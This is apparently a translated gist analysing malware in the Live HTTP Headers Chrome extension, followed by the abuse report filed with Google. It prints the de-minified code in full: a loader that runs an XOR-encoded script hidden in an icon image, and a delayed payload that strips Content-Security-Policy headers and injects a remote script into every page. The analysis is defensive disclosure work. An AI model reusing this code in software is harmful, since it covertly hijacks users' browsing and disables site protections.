@aburd
Forked from mala/a.md
Last active November 12, 2016 10:24
Investigation into the Live HTTP Headers Chrome Extension (Introduced by CoolBar.Pro - An investigation into what the extension is actually doing)

I looked into the Live HTTP Headers Chrome Extension some more. This is not the one for Firefox.

11/7 note


background.min

  • There is code that reads JavaScript cut out of a picture file and turns it into a Blob; addScript then adds it as a script tag to background.html (the extension context).
  • If the extension's localStorage T variable is undefined, a setTimeout of 4568904 milliseconds sets T to the current time.
  • Once the current time is set, the script from the picture file is read in.

the script inside the picture

  • If localStorage's ID property is undefined, then it is defined as the current time after 3600000 milliseconds using setTimeout.

  • Furthermore, if the difference between the ID value and the current time is greater than 86400000 milliseconds, then an event handler is set on web requests.

  • The script that is read in dynamically runs on the web page being displayed, not on the background page.

  • At that time, if there is a CSP header, it disables it.


What happens (in reality)

  • Once the extension is installed and about one day has passed, script injection into the page becomes enabled.
  • Once it is enabled, the CSP settings on the website side are disabled.
  • You can tell whether this is enabled by checking whether, on a CSP-enabled website, you can perform actions that are normally not allowed on a CSP-enabled site. For example, typing something like document.write("<script>alert(1)</script>") into the developer console on github.
  • I haven't looked into the script that is loaded dynamically.

What could happen (possibly)

  • Theoretically, with the permissions of an extension, anything that can be sent and received over HTTP, including the headers, could be taken. However, since the dynamically loaded script is executed in the context of a web page, realistically it can't go that far.

  • The modified response headers can be statically written within the extension.

  • There are things that can be acquired, like user input into the website, contents shown on the page, cookies without the httponly flag, etc.

  • A Chrome extension's default CSP does not allow outside scripts to be loaded into the extension context: https://developer.chrome.com/extensions/contentSecurityPolicy

  • So, unless the manifest.json file expressly declares that outside scripts are allowed, the set of scripts that can execute within the extension context cannot be changed.

  • So if the technique of script injection on a page is used, you won't, for example, have all your data stolen the moment the script is installed on a page.

  • But the influence of the script persists on all sites visited while the extension is enabled.

About the source of the script

  • Judging by the HTML of the extension's privacy policy and the script at the AWS URL, the service being used is coolbar.pro.
  • On the site, it says that they are a service oriented towards the monetizing of extensions.
  • This code was acquired by another company, and malware was inserted into it.
  • You can't register unless you have an invite code, so I couldn't tell what menus were there.

For consideration

  • The code itself does things like load an outside script that only becomes enabled after a fixed period of time, so its odd behavior is rather hard to detect.

  • It would be hard to catch the code hidden inside the image through things like automatic scans.

  • They are using methods that are hard to detect, which are the methods of malware.

  • At the point that CSP is disabled on the client side, this is, to say the least, harmful.

```javascript
// background.min (de-minified): the visible feature, plus the hidden loader
var viewTabId = 0;
chrome.browserAction.onClicked.addListener(function () {
  var a = chrome.extension.getURL("live.html");
  if (0 != viewTabId) try { chrome.tabs.remove(viewTabId, function () {}) } catch (a) { console.log(a) }
  chrome.tabs.create({ url: a })
});
(() => {
  // main(): read img/icon2.png as text, cut out the bytes between the last
  // "init>" and "<end", XOR each with 77 and run the result as a Blob script
  var main = () => {
    chrome.runtime.getPackageDirectoryEntry(function (root) {
      var icon = "img/icon2.png";
      root.getFile(icon, {}, function (fileEntry) {
        fileEntry.file(function (file) {
          var reader = new FileReader();
          reader.onloadend = function (e) {
            var text = this.result;
            var idxF = text.lastIndexOf("init>");
            if (idxF < 0) return;
            text = text.substr(idxF + 5);
            var idxL = text.lastIndexOf("<end");
            if (idxL < 0) return;
            text = text.substr(0, idxL);
            for (var t = 0, r = text.length, n = ""; r > t;)
              n += String.fromCharCode(77 ^ text.charCodeAt(t++));
            var a = new window.Blob([n], {
              type: "text/javascript"
            });
            addScript(window.URL.createObjectURL(a));
          };
          reader.readAsText(file);
        }, (e) => {
          console.log(e)
        });
      }, (r) => {
        console.log(r)
      });
    });
  };
  // check(): poll every 10 minutes (6e5 ms) until T has been written, then run main()
  var check = () => {
    chrome.storage.local.get({ T: 0 }, (r) => {
      r.T == 0 ? setTimeout(check, 6e5) : main();
    })
  };
  // Context-menu entries for the EULA, privacy policy and terms
  (() => {
    if (!chrome.contextMenus) {
      return void console.log("Chrome contextMenus access failed"); // live_http_headers
    }
    chrome.contextMenus.create({
      title: "EULA",
      contexts: ["browser_action"],
      onclick: function () {
        window.open("/html/doc/eula.html", "_blank");
      }
    });
    chrome.contextMenus.create({
      title: "Privacy Policy",
      contexts: ["browser_action"],
      onclick: function () {
        window.open("/html/doc/pp.html", "_blank");
      }
    });
    chrome.contextMenus.create({
      title: "Terms and Conditions",
      contexts: ["browser_action"],
      onclick: function () {
        window.open("/html/doc/tandc.html", "_blank");
      }
    });
  })();
  // Append a <script> tag to background.html, i.e. run it in the extension context
  function addScript(src) {
    var script = document.createElement("script");
    script.setAttribute("type", "text/javascript");
    script.setAttribute("src", src);
    document.head.appendChild(script);
  }
  // T is first written about 76 minutes (4568904 ms) after the background page starts
  setTimeout(function () {
    chrome.storage.local.get({ T: 0 }, (r) => {
      r.T == 0 && chrome.storage.local.set({ T: new Date().getTime() });
    });
  }, 4568904);
  check()
})();
chrome.runtime.setUninstallURL('http://extsgo.com/api/tracker/uninstall?ext_id=' + chrome.runtime.id);
```
```javascript
// blob:chrome-extension://iaiioopjkcekapmldfgbebdclcnpgnlo/45c84012-29d7-4340-8657-934c073f06fb
// The script decoded from the image. zero() records ID on its first run and
// re-checks every a ms; once b ms have passed since ID it calls one(), which
// strips the Content-Security-Policy header from every main-frame response and
// injects a remote script into each page as it finishes loading.
var zero = (a, b) => {
  chrome.storage.local.get({
    ID: 0
  }, (c => {
    0 == c.ID ? (() => {
      chrome.storage.local.set({
        ID: (new Date).getTime()
      }),
      setTimeout(zero, a, a, b)
    })() : (() => {
      ((new Date).getTime() - c.ID || 0) < b ? setTimeout(zero, a, a, b) : one()
    })()
  }))
}, one = () => {
  chrome.webRequest && chrome.webRequest.onHeadersReceived.addListener((a => {
    if (a.tabId != -1) {
      for (var b in a.responseHeaders)
        "object" == typeof a.responseHeaders[b] && "content-security-policy" === a.responseHeaders[b].name.toLowerCase() && a.responseHeaders.splice(b, 1);
      return {
        responseHeaders: a.responseHeaders
      }
    }
  }), {
    urls: ["<all_urls>"],
    types: ["main_frame"]
  }, ["responseHeaders", "blocking"]),
  chrome.tabs && chrome.tabs.onUpdated.addListener(((a, b) => {
    "complete" == b.status && chrome.tabs.executeScript(a, {
      code: `(() => {var s = document.createElement('script');s.src = '//s3.eu-central-1.amazonaws.com/forton/live_http_headers.js';document.body.appendChild(s);})();`
    })
  }))
};
// 36e5 ms = one hour between checks, 864e5 ms = 24 hours before activation
zero(36e5, 864e5);
```
# Report of improper use, submitted on 11/7
The extension, live http headers, has behaviors which violate the policy on http headers
https://chrome.google.com/webstore/detail/live-http-headers/iaiioopjkcekapmldfgbebdclcnpgnlo
https://chrome.google.com/webstore/detail/http-headers/mhbpoeinkhpajikalhfpjjafpfgjnmgk
- In the extension's background JS, there is hard-to-read, obfuscated script buried within the file.
- On the website side (chrome.tabs.executeScript), outside JS code is being brought in; this is not explained to the user.
- At the very least, this extension includes scripts that are executed on websites (not in the extension), URL tracking, etc. There is a possibility that this is changing the behavior of pages, even after they've been loaded.
- Through setTimeout, this behavior is enabled only after a long period of time (over 24 hours).
- With the webRequestBlocking permission, the website's Content Security Policy is disabled, and outside scripts are then appended to and loaded on the currently accessed webpages.
- Although there are extensions that have a clear reason for relaxing CSP, those extensions explain to users that they disable CSP to load and execute outside scripts.
This is against Google Store's policy.
https://developer.chrome.com/webstore/program_policies
"We don't allow content that harms or interferes with the operation of the networks, servers, or other infrastructure of Google or any third-parties."
Furthermore, this can be considered unwanted software.
https://www.google.com/about/company/unwanted-software-policy.html
There are 2 patterns/methods in which the hidden functionality is buried.
1. There is obfuscated, hard-to-read code within the library.
2. There is a hard-to-read script buried within an image file.
For number one, both the functions "jquery.check" and "jquery.proceed" are not in the original jQuery library. The string "String.fromCharCode(77" is also included.
A few have been deleted from the Store, so this is probably something that is already known. You have probably also received reports from other users.
Regarding number two, from around 2016-10-17 there has been a pattern of a script embedded inside an image file. Not one of those with the script inside the image has been deleted.
...snip...
Other than http headers and live http headers, there are other extensions with the same obfuscated code available for download.
...snip...